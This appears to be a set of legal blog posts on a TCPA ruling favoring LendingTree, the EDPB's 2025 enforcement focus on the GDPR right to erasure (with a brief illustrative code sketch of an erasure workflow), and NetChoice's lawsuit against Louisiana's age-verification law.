In Sapan v. LendingTree, No. 8:23-cv-00071 (C.D. Cal. Mar. 18, 2025), the Court just entered judgment in favor of Tree, finding it cannot be held responsible for calls made by affiliates in its pay-per-call program. Absolutely MASSIVE win.
The ruling turned on vicarious liability principles and applied the critical case of Jones v. Royal Administration Services, Inc., 887 F.3d 443 (9th Cir. 2018), which is the primary Ninth Circuit authority on the issue.
Under Jones, a party must control the injury-causing conduct to be held liable for calls. And where a party is making calls that may be transferred to any number of buyers, the party that happens to buy a given call simply cannot be held liable for the transfer.
In light of that authority, the Sapan court found Tree was not liable because it did not directly control the caller, and the mere fact that it accepted a transfer is not dispositive.
Excellent result, and undoubtedly the correct one!
This is an important ruling for folks to keep in mind. A ton of litigation arises following lead gen third-party transfers, and folks buying leads on non-exclusive campaigns should be citing this case!

Coming Soon: Coordinated Pan-European Enforcement of the ‘Right to Erasure’

The European Data Protection Board (EDPB) recently announced the launch of its 2025 Coordinated Enforcement Framework (CEF) action, which will focus on the right to erasure, also known as the “right to be forgotten,” or, in the United States, the “right to delete.”
This initiative marks a significant shift in enforcement priorities for Europe’s Data Protection Authorities (DPAs) and reflects an increased focus on ensuring compliance with Article 17 of the General Data Protection Regulation (GDPR), which grants individuals the right to have their personal data deleted in certain situations.

Quick Hits

EDPB’s 2025 Enforcement Focus: The CEF will prioritize enforcement of the right to erasure under Article 17 of the GDPR and involve coordination among thirty-two DPAs across Europe.
Increased Scrutiny of Compliance: Organizations may face increased information requests, investigations, and follow-up actions to evaluate their erasure practices and identify compliance gaps.
Preparing for Enforcement: Organizations will likely want to review and refine their erasure request processes to ensure timely responses, proper application of exceptions, and effective data deletion across all systems, including backup systems. They may also want to review their broader GDPR compliance framework to mitigate possible risk in the event of a broader request for information.

The right to erasure is one of the most frequently exercised rights under the GDPR. However, it is also a common source of complaints to DPAs and, when exercised in conjunction with other rights, such as the right to portability, is one of the more visible areas of GDPR noncompliance. The 2025 CEF action involves thirty-two DPAs across the European Economic Area that will begin contacting organizations directly to engage in formal and informal activities aimed at evaluating how the organizations handle and respond to erasure requests. A particular focus of the CEF action will be:

assessing organizational compliance with the conditions and exceptions outlined in Article 17 of the GDPR;
identifying gaps in the processes used by data controllers to manage data subject requests to erase; and
promoting best practices for organizations’ handling of such requests.

Organizations across various sectors can expect increased scrutiny from DPAs. This may include simple information requests from DPAs to evaluate their current erasure practices and procedures, but will also, in some circumstances, result in formal investigations and regulatory follow-up actions. Because this is a coordinated, pan-European enforcement focus, organizations can expect more targeted follow-ups both nationally and internationally as the year progresses.
Organizations can prepare for the heightened attention due to be paid to their erasure request handling processes by taking proactive steps to ensure that their data management practices align with GDPR requirements, particularly regarding:

timely and accurate responses to erasure requests (i.e., within one month of the request);
accurate application of exceptions, such as when data retention is necessary for legal compliance, or tasks carried out in the public interest or in the exercise of official authority;
appropriate notification of erasure requests to other organizations where relevant personal data has been disclosed or made public;
comprehensive processes to effectively erase data, such as erasure of personal data on backup systems in addition to live systems (see the sketch after this list); and
transparent communication with individuals who submit requests for erasure about their rights and the outcomes of their requests.
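As a rough illustration of the erasure and notification points above, the sketch below (hypothetical TypeScript, with made-up store and recipient names; it is not a compliance recipe or a DPA-endorsed implementation) shows an erasure workflow that checks a retention exception first, then deletes across live and backup systems and notifies downstream recipients:

```typescript
// Hypothetical sketch of an Article 17 erasure workflow. All names and
// interfaces are illustrative assumptions, not a prescribed implementation.
interface DataStore {
  name: string;
  deleteSubject(subjectId: string): Promise<void>;
}

async function handleErasureRequest(
  subjectId: string,
  stores: DataStore[], // live databases AND backup systems
  retentionHolds: Set<string>, // e.g., legal-compliance retention duties
  downstreamRecipients: string[], // organizations the data was disclosed to
): Promise<string> {
  // Apply exceptions first: retention required by law can defeat erasure
  // under Article 17(3), and any refusal must be explained to the requester.
  if (retentionHolds.has(subjectId)) {
    return "Refused: data retained under a legal obligation (Art. 17(3))";
  }
  // Erase from every system holding the data, backups included.
  await Promise.all(stores.map((s) => s.deleteSubject(subjectId)));
  // Notify other organizations to which the data was disclosed.
  for (const recipient of downstreamRecipients) {
    console.log(`Notify ${recipient}: erase data for subject ${subjectId}`);
  }
  return "Erased and notifications sent within the one-month window";
}
```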

Organizations may also want to review their broader GDPR compliance frameworks, as a single identified noncompliance issue can become a pulled thread that unravels further areas of scrutiny and potentially triggers a larger and broader investigation into the business’s overall compliance posture.

NetChoice Sues to Halt Louisiana Age Verification and Personalized Ad Law

On March 18, 2025, NetChoice filed a lawsuit seeking to enjoin a Louisiana law, the Secure Online Child Interaction and Age Limitation Act (S.B. 162) (“Act”), from taking effect this July. The Act requires covered social media companies to obtain express consent from parents or guardians before minors under the age of 16 may create social media accounts. It also requires covered companies to “make commercially reasonable efforts to verify the age of Louisiana account holders” to determine whether a user is likely to be a minor. Further, the Act prohibits targeted advertising to children.
In its complaint, NetChoice has raised a First Amendment objection to the age verification requirement, arguing that the obligation “would place multiple restrictions on minors’ and adults’ abilities to access covered websites and, in some cases, block access altogether.” NetChoice has argued that the restriction is content-based because the law singles out social media platforms and compels speech by requiring them to verify users’ ages. NetChoice has also argued that the law’s definition of targeted advertising is overly broad and not properly tailored to mitigate the potential impacts on free speech; in other words, NetChoice contends that Louisiana has not shown that the age verification and advertising restrictions are necessary and narrowly tailored to address the impact of social media use on minors.
We previously blogged about lawsuits NetChoice has filed seeking to block Age Appropriate Design Code laws in California and Maryland.